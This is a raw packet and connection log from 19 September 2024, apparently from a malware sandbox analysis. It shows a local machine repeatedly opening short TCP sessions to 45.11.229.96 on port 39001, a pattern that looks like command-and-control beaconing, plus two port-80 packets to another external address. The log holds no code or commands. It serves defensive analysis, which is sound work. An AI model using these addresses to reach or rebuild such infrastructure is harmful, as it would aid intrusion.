Sep 19, 2024 02:26:12.853251934 CEST	39001	49791	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:12.984036922 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:13.031717062 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:13.159905910 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:13.161694050 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:13.166553974 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:13.166599989 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:13.171367884 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:13.518733978 CEST	39001	49791	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:13.518951893 CEST	49791	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:13.518951893 CEST	49791	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:13.523793936 CEST	39001	49791	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:13.626466036 CEST	49792	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:13.631519079 CEST	39001	49792	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:13.631617069 CEST	49792	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:13.642823935 CEST	49792	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:13.647703886 CEST	39001	49792	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:13.647782087 CEST	49792	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:13.652611971 CEST	39001	49792	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:14.293060064 CEST	39001	49792	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:14.293132067 CEST	49792	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:14.293271065 CEST	49792	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:14.298095942 CEST	39001	49792	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:14.407582045 CEST	49793	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:14.412451982 CEST	39001	49793	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:14.412539005 CEST	49793	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:14.460520029 CEST	49793	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:14.465352058 CEST	39001	49793	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:14.465415955 CEST	49793	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:14.470180988 CEST	39001	49793	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.053529978 CEST	39001	49793	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.053627014 CEST	49793	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.053744078 CEST	49793	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.058487892 CEST	39001	49793	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.157524109 CEST	49794	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.162550926 CEST	39001	49794	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.162652969 CEST	49794	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.174894094 CEST	49794	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.181937933 CEST	39001	49794	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.184197903 CEST	49794	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.189258099 CEST	39001	49794	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.813108921 CEST	39001	49794	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.813194990 CEST	49794	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.813313007 CEST	49794	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.818030119 CEST	39001	49794	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.923291922 CEST	49795	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.928297997 CEST	39001	49795	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.928390980 CEST	49795	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.939019918 CEST	49795	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.943789005 CEST	39001	49795	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:15.943841934 CEST	49795	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:15.948554039 CEST	39001	49795	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:16.559464931 CEST	39001	49795	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:16.559540033 CEST	49795	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:16.559667110 CEST	49795	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:16.564438105 CEST	39001	49795	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:16.673320055 CEST	49796	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:16.678344965 CEST	39001	49796	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:16.678443909 CEST	49796	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:16.699801922 CEST	49796	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:16.704665899 CEST	39001	49796	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:16.704735041 CEST	49796	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:16.709597111 CEST	39001	49796	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:17.346237898 CEST	39001	49796	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:17.346349955 CEST	49796	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:17.346463919 CEST	49796	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:17.351201057 CEST	39001	49796	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:17.454411030 CEST	49797	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:17.459501982 CEST	39001	49797	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:17.459701061 CEST	49797	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:17.471355915 CEST	49797	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:17.476212978 CEST	39001	49797	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:17.476290941 CEST	49797	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:17.481101036 CEST	39001	49797	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:18.173068047 CEST	39001	49797	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:18.173136950 CEST	49797	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:18.173243046 CEST	49797	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:18.178041935 CEST	39001	49797	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:18.282645941 CEST	49798	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:18.287564039 CEST	39001	49798	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:18.287657976 CEST	49798	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:18.299623013 CEST	49798	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:18.304502010 CEST	39001	49798	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:18.304574966 CEST	49798	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:18.309381962 CEST	39001	49798	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:18.918529034 CEST	39001	49798	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:18.918631077 CEST	49798	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:18.918833017 CEST	49798	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:18.923698902 CEST	39001	49798	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:19.033102989 CEST	49799	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.038048029 CEST	39001	49799	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:19.038144112 CEST	49799	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.050626040 CEST	49799	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.055593967 CEST	39001	49799	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:19.055665016 CEST	49799	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.060488939 CEST	39001	49799	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:19.714061975 CEST	39001	49799	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:19.714257956 CEST	49799	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.714308977 CEST	49799	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.719172955 CEST	39001	49799	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:19.829720020 CEST	49800	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.834709883 CEST	39001	49800	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:19.834798098 CEST	49800	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.845916033 CEST	49800	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.850841999 CEST	39001	49800	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:19.850893021 CEST	49800	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:19.855715990 CEST	39001	49800	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:20.518744946 CEST	39001	49800	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:20.518939972 CEST	49800	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:20.518939972 CEST	49800	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:20.523838997 CEST	39001	49800	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:20.627032995 CEST	49801	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:20.632005930 CEST	39001	49801	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:20.632091045 CEST	49801	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:20.650789022 CEST	49801	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:20.655582905 CEST	39001	49801	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:20.655653000 CEST	49801	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:20.660446882 CEST	39001	49801	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:21.312500954 CEST	39001	49801	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:21.312576056 CEST	49801	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:21.315964937 CEST	49801	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:21.320774078 CEST	39001	49801	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:21.485937119 CEST	49802	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:21.490995884 CEST	39001	49802	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:21.491116047 CEST	49802	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:21.514548063 CEST	49802	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:21.519344091 CEST	39001	49802	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:21.519418955 CEST	49802	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:21.727421999 CEST	39001	49802	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:22.141772985 CEST	39001	49802	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:22.141868114 CEST	49802	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:22.141978979 CEST	49802	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:22.146765947 CEST	39001	49802	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:22.251496077 CEST	49804	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:22.256673098 CEST	39001	49804	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:22.256772995 CEST	49804	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:22.269117117 CEST	49804	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:22.273897886 CEST	39001	49804	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:22.273957968 CEST	49804	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:22.279014111 CEST	39001	49804	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:22.887727976 CEST	39001	49804	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:22.887794971 CEST	49804	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:22.887919903 CEST	49804	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:22.892669916 CEST	39001	49804	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:23.001276016 CEST	49805	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:23.006273985 CEST	39001	49805	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:23.006386995 CEST	49805	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:23.017091036 CEST	49805	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:23.021996021 CEST	39001	49805	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:23.022057056 CEST	49805	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:23.026911974 CEST	39001	49805	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:23.696530104 CEST	39001	49805	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:23.696610928 CEST	49805	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:23.696727037 CEST	49805	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:23.701507092 CEST	39001	49805	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:23.815469027 CEST	49806	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:23.820420980 CEST	39001	49806	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:23.820554018 CEST	49806	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:24.334729910 CEST	49806	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:24.341922998 CEST	39001	49806	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:24.341990948 CEST	49806	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:24.348017931 CEST	39001	49806	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:24.723300934 CEST	39001	49806	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:24.723417997 CEST	49806	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:24.723568916 CEST	49806	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:24.728280067 CEST	39001	49806	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:24.847173929 CEST	49807	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:24.852034092 CEST	39001	49807	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:24.852113008 CEST	49807	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:24.871754885 CEST	49807	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:24.876595020 CEST	39001	49807	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:24.876666069 CEST	49807	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:24.881442070 CEST	39001	49807	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:25.497956991 CEST	39001	49807	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:25.498044968 CEST	49807	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:25.498199940 CEST	49807	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:25.503052950 CEST	39001	49807	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:25.612518072 CEST	49808	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:25.618058920 CEST	39001	49808	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:25.618145943 CEST	49808	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:25.659284115 CEST	49808	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:25.664484024 CEST	39001	49808	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:25.664561033 CEST	49808	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:25.669486046 CEST	39001	49808	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:26.266030073 CEST	39001	49808	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:26.266107082 CEST	49808	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:26.266366959 CEST	49808	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:26.275520086 CEST	39001	49808	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:26.381633043 CEST	49809	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:26.387541056 CEST	39001	49809	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:26.387626886 CEST	49809	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:26.418459892 CEST	49809	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:26.426439047 CEST	39001	49809	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:26.426533937 CEST	49809	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:26.431493044 CEST	39001	49809	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:27.039419889 CEST	39001	49809	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:27.040359974 CEST	49809	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:27.179552078 CEST	49809	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:27.190336943 CEST	39001	49809	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:27.298188925 CEST	49811	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:27.307051897 CEST	39001	49811	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:27.307156086 CEST	49811	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:27.330642939 CEST	49811	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:27.335777998 CEST	39001	49811	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:27.335844040 CEST	49811	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:27.340792894 CEST	39001	49811	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:27.971879959 CEST	39001	49811	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:27.972008944 CEST	49811	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:27.972110033 CEST	49811	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:27.976991892 CEST	39001	49811	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:28.079602003 CEST	49812	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.084707022 CEST	39001	49812	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:28.084813118 CEST	49812	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.097083092 CEST	49812	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.102083921 CEST	39001	49812	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:28.102169991 CEST	49812	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.106996059 CEST	39001	49812	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:28.755753994 CEST	39001	49812	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:28.755938053 CEST	49812	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.756019115 CEST	49812	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.761188984 CEST	39001	49812	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:28.876698971 CEST	49813	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.881819010 CEST	39001	49813	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:28.881917953 CEST	49813	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.901308060 CEST	49813	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.906243086 CEST	39001	49813	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:28.906325102 CEST	49813	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:28.911237955 CEST	39001	49813	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:29.540414095 CEST	39001	49813	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:29.540523052 CEST	49813	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:29.540724993 CEST	49813	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:29.545500994 CEST	39001	49813	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:30.583466053 CEST	49814	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:30.588524103 CEST	39001	49814	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:30.588609934 CEST	49814	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:30.616100073 CEST	49814	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:30.620965004 CEST	39001	49814	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:30.621052980 CEST	49814	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:30.625880003 CEST	39001	49814	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:31.294787884 CEST	39001	49814	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:31.294903040 CEST	49814	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:31.295007944 CEST	49814	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:31.299848080 CEST	39001	49814	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:31.407510042 CEST	49815	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:31.412945032 CEST	39001	49815	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:31.413072109 CEST	49815	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:31.450872898 CEST	49815	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:31.455925941 CEST	39001	49815	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:31.456021070 CEST	49815	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:31.460896015 CEST	39001	49815	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:32.078749895 CEST	39001	49815	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:32.078865051 CEST	49815	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:32.105853081 CEST	49815	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:32.111099958 CEST	39001	49815	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:32.220108032 CEST	49816	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:32.225202084 CEST	39001	49816	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:32.225362062 CEST	49816	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:32.256472111 CEST	49816	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:32.261387110 CEST	39001	49816	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:32.261437893 CEST	49816	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:32.266478062 CEST	39001	49816	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:32.853878021 CEST	39001	49816	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:32.853954077 CEST	49816	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:32.854485989 CEST	49816	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:32.859272003 CEST	39001	49816	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:33.155790091 CEST	49817	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:33.160933018 CEST	39001	49817	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:33.161092043 CEST	49817	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:33.640425920 CEST	49817	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:33.645494938 CEST	39001	49817	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:33.645576000 CEST	49817	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:33.650607109 CEST	39001	49817	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:33.964179993 CEST	39001	49817	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:33.964307070 CEST	49817	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:33.964396000 CEST	49817	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:33.969165087 CEST	39001	49817	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:34.080528021 CEST	49818	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.086174011 CEST	39001	49818	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:34.086416006 CEST	49818	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.107800007 CEST	49818	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.112723112 CEST	39001	49818	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:34.112792015 CEST	49818	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.117674112 CEST	39001	49818	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:34.393356085 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:26:34.535356045 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:26:34.769126892 CEST	39001	49818	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:34.769212961 CEST	49818	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.769309998 CEST	49818	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.774241924 CEST	39001	49818	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:34.876363039 CEST	49819	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.881377935 CEST	39001	49819	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:34.881470919 CEST	49819	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.988898993 CEST	49819	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.993891954 CEST	39001	49819	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:34.993976116 CEST	49819	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:34.998842001 CEST	39001	49819	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:35.525568962 CEST	39001	49819	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:35.525646925 CEST	49819	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:35.525753021 CEST	49819	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:35.530590057 CEST	39001	49819	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:35.645822048 CEST	49820	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:35.650935888 CEST	39001	49820	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:35.651051044 CEST	49820	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:37.115859985 CEST	49820	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:37.120985985 CEST	39001	49820	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:37.121072054 CEST	49820	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:37.125869989 CEST	39001	49820	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:37.490644932 CEST	39001	49820	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:37.490850925 CEST	49820	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:37.490850925 CEST	49820	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:37.495779991 CEST	39001	49820	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:37.640064001 CEST	49821	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:37.645318985 CEST	39001	49821	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:37.645391941 CEST	49821	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:38.427411079 CEST	49821	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:38.433135033 CEST	39001	49821	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:38.434178114 CEST	49821	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:38.438939095 CEST	39001	49821	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:38.827017069 CEST	39001	49821	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:38.827095032 CEST	49821	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:38.827263117 CEST	49821	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:38.832020998 CEST	39001	49821	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:39.084543943 CEST	49822	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:39.089483976 CEST	39001	49822	45.11.229.96	192.168.2.6
Sep 19, 2024 02:26:39.089551926 CEST	49822	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:26:39.767011881 CEST	49822	39001	192.168.2.6	45.11.229.96
